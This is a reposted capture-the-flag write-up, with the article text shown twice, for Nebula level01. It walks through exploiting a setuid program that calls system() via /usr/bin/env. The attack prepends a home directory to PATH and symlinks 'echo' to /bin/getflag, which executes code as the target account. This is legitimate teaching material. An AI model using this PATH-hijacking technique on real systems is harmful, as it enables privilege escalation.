Nebula_level01
2015-01-28 01:48
274 查看
http://www.kroosec.com/2012/10/nebula-level01.html
In
level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int
argc, char
**argv, char
**envp)
{
gid_t gid;
uid_t uid;
gid =
getegid();
uid =
geteuid();
setresgid(gid,
gid, gid);
setresuid(uid,
uid, uid);
system("/usr/bin/env echo and now what?");
}
The system() library call executes echo "and now what?"
level01@nebula:~$ ../flag01/flag01
and now what?
but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever came across scripts starting with
#!/usr/bin/env python ? This is used for portability issues, as fixing a path (such as /usr/bin/python) wouldn't work when the Python interpreter is installed in a different location. How does env look for the specified program ? it simply
searches in the directories specified in the
PATH
environment variable starting from the the first directory, and going through the directories in $PATH until it finds the looked-for program.
level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
How to attack this program ? We will prepend to $PATH a directory in which we will add a symbolic link echo pointing to /bin/getflag.
First we prepend /home/level01 to $PATH
level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ echo $PATH
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
Now we create a symbolic link /home/level01/echo to /bin/getflag
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag
Now flag01 will run our own /home/level01/echo that is simply a symbolic link to /bin/getflag.
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account
Posted
28th October 2012 by
Hani Benhabiles
In
level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is provided:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int
argc, char
**argv, char
**envp)
{
gid_t gid;
uid_t uid;
gid =
getegid();
uid =
geteuid();
setresgid(gid,
gid, gid);
setresuid(uid,
uid, uid);
system("/usr/bin/env echo and now what?");
}
The system() library call executes echo "and now what?"
level01@nebula:~$ ../flag01/flag01
and now what?
but instead of directly running /bin/echo, it uses /usr/bin/env to find the location of echo. Ever came across scripts starting with
#!/usr/bin/env python ? This is used for portability issues, as fixing a path (such as /usr/bin/python) wouldn't work when the Python interpreter is installed in a different location. How does env look for the specified program ? it simply
searches in the directories specified in the
PATH
environment variable starting from the the first directory, and going through the directories in $PATH until it finds the looked-for program.
level01@nebula:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
How to attack this program ? We will prepend to $PATH a directory in which we will add a symbolic link echo pointing to /bin/getflag.
First we prepend /home/level01 to $PATH
level01@nebula:~$ export PATH=/home/level01/:$PATH
level01@nebula:~$ echo $PATH
/home/level01/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
Now we create a symbolic link /home/level01/echo to /bin/getflag
level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -l echo
lrwxrwxrwx 1 level01 level01 12 2012-10-28 12:32 echo -> /bin/getflag
Now flag01 will run our own /home/level01/echo that is simply a symbolic link to /bin/getflag.
level01@nebula:~$ ../flag01/flag01
You have successfully executed getflag on a target account
Posted
28th October 2012 by
Hani Benhabiles
相关文章推荐
- i春秋 - Exploit-Exercises: Nebula - level01
- ExploitExercises_Nebula_Level01
- Nebula3学习笔记(1): 序
- Nebula3脚本系统
- Nebula3学习笔记(6): 网络系统
- 做了Nebula3的应用程序向导
- Nebula3中的Entity
- Exploit Exercises - Nebula Level 00
- Nebula3的多线程架构
- Nebula3的场景管理
- Nebula3学习笔记(4): IO系统
- 高性能流媒体服务器-nebula之数据结构(7)--环形无锁队列
- i春秋 - Exploit-Exercises: Nebula - level00
- Nebula3学习笔记(2): Hello World
- [导入]Nebula3脚本系统
- Nebula3学习笔记(7): 脚本系统
- Nebula3中的委托(Delegate)
- orge,Nebula与klayGE对比
- Exploit Exercise Nebula 5 Level 00
- Nebula3资源子系统